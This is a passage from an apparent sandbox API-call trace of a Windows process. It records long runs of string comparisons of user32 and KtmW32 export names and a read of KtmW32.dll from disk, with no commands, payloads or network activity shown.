(lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0123.486] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0123.487] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0123.488] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0125.024] GetProcessHeap () returned 0x480000 [0125.024] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4070040 | out: hHeap=0x480000) returned 1 [0125.032] GetProcessHeap () returned 0x480000 [0125.032] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499140 [0125.032] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0125.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0125.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0125.040] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0125.040] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0125.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0125.040] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0125.041] GetProcessHeap () returned 0x480000 [0125.041] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5e00) returned 0x2cb5030 [0125.041] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0125.041] ReadFile (in: hFile=0x17c, lpBuffer=0x2cb5030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb5030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0125.042] CloseHandle (hObject=0x17c) returned 1 [0125.042] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0125.043] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0125.043] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0125.043] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0125.043] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0125.043] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0125.043] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0125.043] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0125.043] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0125.043] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0125.043] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0125.043] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0125.043] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0125.043] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0125.043] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0125.043] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0125.043] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0125.043] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0125.044] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0125.044] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0125.044] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0125.044] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0125.046] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0125.046] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0125.046] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0125.047] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0125.047] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0125.047] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0125.047] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0125.047] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0125.048] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0125.049] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0125.050] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.051] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0125.051] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0125.051] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0125.051] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0125.051] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0125.051] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0125.054] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0125.055] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0125.055] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0125.089] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0125.090] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0125.090] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0125.090] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0125.090] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0125.091] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0125.091] 